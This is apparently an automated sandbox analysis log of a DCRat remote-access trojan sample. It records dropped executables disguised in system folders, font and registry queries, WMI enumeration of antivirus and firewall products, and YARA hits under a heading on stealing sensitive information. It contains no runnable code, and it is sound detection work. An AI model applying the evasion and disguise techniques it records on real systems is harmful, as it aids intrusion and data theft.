Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exeQueries volume information: C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_009A0970 CreateNamedPipeW,CreateFileW,3_2_009A0970
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_004ADF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,1_2_004ADF1E
                                    Source: C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exeCode function: 3_2_0099F2B0 GetUserNameW,GetUserNameW,GetLastError,GetUserNameW,GetEnvironmentVariableW,GetEnvironmentVariableW,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,RegCloseKey,3_2_0099F2B0
                                    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 1_2_0049B146 GetVersionExW,1_2_0049B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2938049506.000000001B820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    Source: Yara match | File source: 00000024.00000002.2899943903.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 0000000B.00000002.1853703523.0000000012EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: Process Memory Space: webDriverintoDll.exe PID: 7364, type: MEMORYSTR
                                    Source: Yara match | File source: Process Memory Space: KAdpNCgonFhCnlBRasdZerWl.exe PID: 8028, type: MEMORYSTR
                                    Source: Yara match | File source: gorkmTnChA.exe, type: SAMPLE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.5218700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 11.0.webDriverintoDll.exe.4e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.68dd700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 1.3.DCRatBuild.exe.68dd700.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.gorkmTnChA.exe.2c2170f.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.45797b.3.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.45797b.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 0.0.gorkmTnChA.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match | File source: 00000000.00000003.1654559691.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000001.00000003.1656268229.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 00000001.00000003.1655715436.000000000688F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match | File source: 0000000B.00000000.1775306001.00000000004E2000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
